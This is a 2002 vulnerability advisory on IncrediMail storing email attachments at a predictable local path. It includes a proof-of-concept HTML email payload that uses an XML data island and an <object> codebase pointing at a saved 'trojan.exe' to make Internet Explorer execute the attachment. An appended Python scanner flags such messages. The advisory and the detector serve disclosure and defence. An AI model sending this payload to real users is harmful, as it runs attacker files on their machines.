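IncrediMail Ltd. IncrediMail Predictable Attachment Location Vulnerability
Published: 2002-03-19
Updated: 2002-03-19
Severity: Medium
Threat level: Server information disclosure
Error type: Design error
Exploitation method: Server mode
BUGTRAQ ID:4297
Affected systems
IncrediMail Ltd. IncrediMail 0.0Build 618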
- Microsoft Windows 2000 Professional 0.0
- Microsoft Windows 2000 Professional 0.0SP1
- Microsoft Windows 2000 Professional 0.0SP2
- Microsoft Windows 95 0.0
- Microsoft Windows 98 0.0
- Microsoft Windows ME 0.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0SP1
- Microsoft Windows NT Workstation 4.0SP2
- Microsoft Windows NT Workstation 4.0SP3
- Microsoft Windows NT Workstation 4.0SP4
- Microsoft Windows NT Workstation 4.0SP5
- Microsoft Windows NT Workstation 4.0SP6
- Microsoft Windows NT Workstation 4.0SP6a
- Microsoft Windows XP Home 0.0
IncrediMail Ltd. IncrediMail 0.0Build 560
- Microsoft Windows 2000 Professional 0.0
- Microsoft Windows 2000 Professional 0.0SP1
- Microsoft Windows 2000 Professional 0.0SP2
- Microsoft Windows 95 0.0
- Microsoft Windows 98 0.0
- Microsoft Windows ME 0.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0SP1
- Microsoft Windows NT Workstation 4.0SP2
- Microsoft Windows NT Workstation 4.0SP3
- Microsoft Windows NT Workstation 4.0SP4
- Microsoft Windows NT Workstation 4.0SP5
- Microsoft Windows NT Workstation 4.0SP6
- Microsoft Windows NT Workstation 4.0SP6a
- Microsoft Windows XP Home 0.0
IncrediMail Ltd. IncrediMail 0.0Build 1400185
- Microsoft Windows 2000 Professional 0.0
- Microsoft Windows 2000 Professional 0.0SP1
- Microsoft Windows 2000 Professional 0.0SP2
- Microsoft Windows 95 0.0
- Microsoft Windows 98 0.0
- Microsoft Windows ME 0.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0SP1
- Microsoft Windows NT Workstation 4.0SP2
- Microsoft Windows NT Workstation 4.0SP3
- Microsoft Windows NT Workstation 4.0SP4
- Microsoft Windows NT Workstation 4.0SP5
- Microsoft Windows NT Workstation 4.0SP6
- Microsoft Windows NT Workstation 4.0SP6a
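- Microsoft Windows XP Home 0.0
Detailed description
IncrediMail is a Windows-based e-mail client that supports sound, animation, backgrounds and similar features.
Some versions of IncrediMail contain a vulnerability: when the program receives an e-mail with a file attachment, the file is automatically saved to a predictable location on the local system. An attacker can use this vulnerability to launch further attacks.
Test code
Sending the following HTML e-mail can cause a vulnerable IE to execute the attachment: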
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="C:/Program Files/IncrediMail/Data/Identities/{42D00B20-479C-11d4-9706-00105A40931C}/Message Store/Attachments/trojan.exe"></object>
]]>
</exploit>
</security>
</xml>
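A defensive check for the message shape shown above, as an added example that is not part of the original advisory: a Python filter a mail gateway could run to flag HTML parts whose `codebase` attribute points at a local path. It searches the raw text rather than a parsed DOM, because the `<object>` tag in the test code sits inside a CDATA section; the function names and the sample message are constructed for illustration.

```python
import re
from email import message_from_string

# codebase=... whose value is a local path: drive letter, file: URL or UNC share.
CODEBASE_RE = re.compile(
    r"""codebase\s*=\s*(["']?)\s*((?:[a-z]:[\\/]|file:|\\\\)[^"'>]*)\1""",
    re.IGNORECASE)
# Data binding that renders a bound field as HTML, as the test code above does.
DATABIND_RE = re.compile(r"""dataformatas\s*=\s*["']?html""", re.IGNORECASE)

# Constructed sample message; the body is the test code from the advisory.
SAMPLE = """\
From: sender@example.com
To: user@example.com
Subject: constructed sample
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="C:/Program Files/IncrediMail/Data/Identities/{42D00B20-479C-11d4-9706-00105A40931C}/Message Store/Attachments/trojan.exe"></object>
]]></exploit></security></xml>
"""

def html_parts(raw_message):
    """Yield the decoded text of every text/html part of an RFC 822 message."""
    for part in message_from_string(raw_message).walk():
        if part.get_content_type() == "text/html":
            payload = part.get_payload(decode=True) or b""
            yield payload.decode(part.get_content_charset() or "utf-8", "replace")

def scan_message(raw_message):
    """Return one finding per codebase attribute that points at a local path.

    The raw text is searched instead of a parsed DOM so that tags hidden in
    CDATA sections or XML data islands are still seen.
    """
    findings = []
    for html in html_parts(raw_message):
        bound = bool(DATABIND_RE.search(html))
        for match in CODEBASE_RE.finditer(html):
            findings.append({"local_path": match.group(2).strip(),
                             "data_bound_html": bound})
    return findings

if __name__ == "__main__":
    for finding in scan_message(SAMPLE):
        print(finding)
```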
Solution
None yet.
Related information
Eric DETOISIEN <eric.detoisien@global-secure.fr>
References: http://online.securityfocus.com/archive/1/262262
http://www.securityfocus.com/bid/3867
Related homepage: http://www.incredimail.com/english/index.html